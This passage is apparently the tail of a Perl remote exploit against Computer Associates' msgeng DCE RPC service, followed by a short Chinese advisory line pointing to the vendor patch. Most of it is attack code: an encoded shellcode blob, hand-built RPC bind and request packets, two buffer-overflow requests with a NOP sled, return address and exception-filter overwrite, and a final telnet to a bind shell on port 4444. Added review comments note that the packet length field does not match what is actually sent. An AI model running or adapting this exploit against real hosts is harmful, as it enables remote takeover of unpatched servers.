"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef".
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff".
"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa".
"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28".
"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79".
"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb".
"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42".
"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63".
"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d".
"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a".
"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07".
"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5".
"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b".
"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa".
"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75".
"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";


# DCE RPC v5 BIND PDU, 72 (0x48) bytes: common header, bind body (max
# xmit/recv 0x16d0, one context with one transfer syntax), the msgeng
# interface UUID dc246bf0-7a7a-11ce-9f88-00805fe43838 v1.0 in wire order
# (first three fields little-endian), then NDR transfer syntax
# 8a885d04-1ceb-11c9-9fe8-08002b104860 v2.  Should be byte-for-byte what
# the C listing's lsDceRpcBind() builds.
my $uuid="\x05".                            #version
"\x00".                                    #version minor
"\x0b".                                    #packet bind
"\x03".                                    #packet flag
"\x10\x00\x00\x00".                            #data rapresentation
"\x48\x00".                                #fragment length
"\x00\x00".                                #auth length
"\x01\x00\x00\x00".                            #call id
"\xd0\x16\xd0\x16".                #max xmit frag, max recv frag (0x16d0 each)
"\x00\x00\x00\x00".                            #assoc group            
"\x01\x00\x00\x00\x00\x00\x01\x00".                    #num ctx items=1, ctx id=0, num trans items=1
"\xf0\x6b\x24\xdc\x7a\x7a\xce\x11\x9f\x88\x00\x80\x5f\xe4\x38\x38".    #uuid
"\x01\x00".                                #interface ver
"\x00\x00".                                #interface ver minor
"\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60".    #transfer syntax
"\x02\x00\x00\x00";                            #syntax ver

# DCE RPC v5 REQUEST header (24 bytes) prepended to both requests below.
# NOTE(review): the fragment length is hard-coded to 0x0818 = 2072 (the C
# listing's PKT_LEN), but the two requests assembled below come to
# 24+680+12+344+1006+2 = 2068 and 24+680+12+344+1029+2 = 2091 bytes, so
# the header does not describe the PDU actually sent.  The C listing
# computes frag_len from what it writes; verify which the server accepts
# before trusting this port.
my $special="\x05".                            #version
"\x00".                                    #version minor
"\x00".                                    #packet type request
"\x03".                                    #packet flags
"\x10\x00\x00\x00".                            #data rapresentation
"\x18\x08".                                #frag length
"\x00\x00".                                #auth length
"\x01\x00\x00\x00".                            #call id
"\x00\x08\x00\x00".                            #alloc hint
"\x00\x00".                                #contex id
"\x2b\x00";                                #opnum 43




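# Connect, bind, send the two overflow requests, then try the bind shell.
# Fixes: send() results are checked (a dropped connection used to go
# unnoticed), and the final telnet is launched with system() in list form
# so $host is passed as an argument instead of being interpolated into a
# shell command line.
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";


$request = $uuid;
defined(send($socket, $request, 0)) or die "send failed: $!\n";
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);


$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
defined(send($socket, $request, 0)) or die "send failed: $!\n";
print "[+] Sent malicius 1st request\n";


$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
defined(send($socket, $request, 0)) or die "send failed: $!\n";
print "[+] Sent malicius 2nd request\n";



print " + Connect on 4444 port of $host ...\n";
sleep(3);
system('telnet', $host, '4444');
exit;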

建议:
厂商补丁:

Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://supportconnect.ca.com/
